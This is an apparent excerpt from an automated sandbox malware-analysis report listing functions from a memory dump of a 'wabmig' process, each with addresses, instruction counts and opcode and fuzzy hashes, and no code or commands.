                                        • Instruction Fuzzy Hash: 28211730A042448FDF14DB38C569BAEBBB2FF89745F100468D546EB290DB7A8D41CBA1
                                        Function 0083A010 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e617b6de68930988abb84a24f622fcc89d1d05a25f1ca42f290061d5fb135f84
                                        • Instruction ID: efb6b8ec1fb9adb9e5fd59bce1c0e26b2cb54d83acdd48e434c959a284d26542
                                        • Opcode Fuzzy Hash: e617b6de68930988abb84a24f622fcc89d1d05a25f1ca42f290061d5fb135f84
                                        • Instruction Fuzzy Hash: BF211031E00609DBDB1CCFA5D4A059EB7B6FF89310F20861AE855FB250DB719C45CB92
                                        Function 00831848 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 159edb13887750db67104b619d73c0dec08cecca346931115b0647144bbaed67
                                        • Instruction ID: 26da969cc36ff1f0b75a223cbe4b478b2d0c96492652b93867d4491b27df0831
                                        • Opcode Fuzzy Hash: 159edb13887750db67104b619d73c0dec08cecca346931115b0647144bbaed67
                                        • Instruction Fuzzy Hash: 1721F430B002088BDF58DA68C569AAE77B6FB89745F500468D506EB390DF7A8D41CBE1
                                        Function 00831670 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8386caed293dbd021c68a8174fb20d5e7cf0202745e4f867ab3228a250c3bed
                                        • Instruction ID: 7f0bf40523c62ae4cfd934bd960e751f014cda8ef7140e6a0402571b14e5a7ce
                                        • Opcode Fuzzy Hash: f8386caed293dbd021c68a8174fb20d5e7cf0202745e4f867ab3228a250c3bed
                                        • Instruction Fuzzy Hash: 16216A307301028BEF29EB6CD898B697B65F7D5711F146A28D106CB2A4EF799C448BD1
                                        Function 00831780 Relevance: .1, Instructions: 65COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e22ca0793c221c0e551bacea7a7353c16f52c74007998955cdbb5bea15fa5d7
                                        • Instruction ID: 5abafd1f8a07d01fdffff7e1246dc8a1f8f4bfc7cdab8a20ee0b65f6058d3518
                                        • Opcode Fuzzy Hash: 1e22ca0793c221c0e551bacea7a7353c16f52c74007998955cdbb5bea15fa5d7
                                        • Instruction Fuzzy Hash: 8611C476F002558FDF60AE799849AAEBBB1FBD8761F180525D905C7344EB39CD028BC0
                                        Function 00831448 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 28d98cb7f2c8f488ed8dd6b1eeaa07ed7cdf963d5e9a10b3874475f19d3483b7
                                        • Instruction ID: f6f79d2221fab0645f2aed025275d864770eaaeb553c47e114d97c17f29da767
                                        • Opcode Fuzzy Hash: 28d98cb7f2c8f488ed8dd6b1eeaa07ed7cdf963d5e9a10b3874475f19d3483b7
                                        • Instruction Fuzzy Hash: 32119435A013158FCF21EFBC84551ADBBE6FB89720F2405B9D445E7282EB35C8428BD6
                                        Function 00830848 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9cdc855acecfbdaee44b4c26aa780100602836b387215abc7a77b5ea40dfae9b
                                        • Instruction ID: 2344fd61d41fa3943253ac62414a7c3a1433245e2713aad1bb9d89ffd59570ad
                                        • Opcode Fuzzy Hash: 9cdc855acecfbdaee44b4c26aa780100602836b387215abc7a77b5ea40dfae9b
                                        • Instruction Fuzzy Hash: F0118F30B112088FEF28ABBAC82473936A5FBD5315F204979D606CF281DE64CC858FC1
                                        Function 00830838 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08bcc7db9b99f62e82c3d40450b6ab4ba91f1956ee0b2b91c92f4808784446b8
                                        • Instruction ID: a2bc765be74e508d51e9d4bbf233c905947d32e78f46861da0974c3f406ba4f8
                                        • Opcode Fuzzy Hash: 08bcc7db9b99f62e82c3d40450b6ab4ba91f1956ee0b2b91c92f4808784446b8
                                        • Instruction Fuzzy Hash: 6611BF30B152088BEF29ABA98C647797B61FBD2355F20497AD502CB282DA64CC858FC1
                                        Function 00831458 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd1da76e7c3568fd71370f2d29bc97dff73bbb55c6efd0283e46b332c8466cdc
                                        • Instruction ID: 04e646a73f6283ade6f4d28c8fce3b2be7037be310331a483b9719766d3cbd92
                                        • Opcode Fuzzy Hash: dd1da76e7c3568fd71370f2d29bc97dff73bbb55c6efd0283e46b332c8466cdc
                                        • Instruction Fuzzy Hash: 63012D35A012159FCF61EFB984552AD7BF6FB88710F2444BAE805E7282EA35CC428BD5
                                        Function 0080D02B Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376309783.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_80d000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 090c0537c78d0a9e0cf557f54a9a46fed39f1def7b615c12cc1720ba391898bf
                                        • Instruction ID: 2723cde0bc7093ee1cc6606c536df62f0da63983fc694cc3bbf43627391eee68
                                        • Opcode Fuzzy Hash: 090c0537c78d0a9e0cf557f54a9a46fed39f1def7b615c12cc1720ba391898bf
                                        • Instruction Fuzzy Hash: B711BB75504784CFCB11CF50D9C0B15FBA1FB84314F28C6AAD8498B6A6C33AD84ACB62
                                        Function 0083E360 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c05c4ba0821ef5e15c9c16ee721ddd176be7b2b9f415af6fab281512d428a890
                                        • Instruction ID: 388a60c8b3a6bb17e568ee9e4c3341992f49fcdcbd566a272abd3b59e230a166
                                        • Opcode Fuzzy Hash: c05c4ba0821ef5e15c9c16ee721ddd176be7b2b9f415af6fab281512d428a890
                                        • Instruction Fuzzy Hash: E6019E313052008BC725AA39999563E7A97ABC5355B14043EF14ACB391DF799C0A87E1
                                        Function 0083F210 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 770c4cf33f38ad6e1103016aaba006707de8e11d552ab149239cde2e6cd6b5f8
                                        • Instruction ID: 50646373bfe7f759d518f73adedebf13286c491b14528879be643b62b4e8a603
                                        • Opcode Fuzzy Hash: 770c4cf33f38ad6e1103016aaba006707de8e11d552ab149239cde2e6cd6b5f8
                                        • Instruction Fuzzy Hash: ECF0B435700216DBDB2566BEE55972BBACBEBC1720F00093DE60ACB252DE65DD0643D1
                                        Function 0083E7C0 Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.3376480337.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_830000_wabmig.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce31488e489c4d977cb71e2ffd967f1b1c435bc020c7db9ff7c38ec6c670452e
                                        • Instruction ID: 715a86d6233ca53822cfd4b56f1a884098460c5b8ff6e632c6c85b808a967089
                                        • Opcode Fuzzy Hash: ce31488e489c4d977cb71e2ffd967f1b1c435bc020c7db9ff7c38ec6c670452e
                                        • Instruction Fuzzy Hash: 50D02B3060D35C6FC3369768A4486527FDAEBC5355F04459DF586C3182DE106801C3D1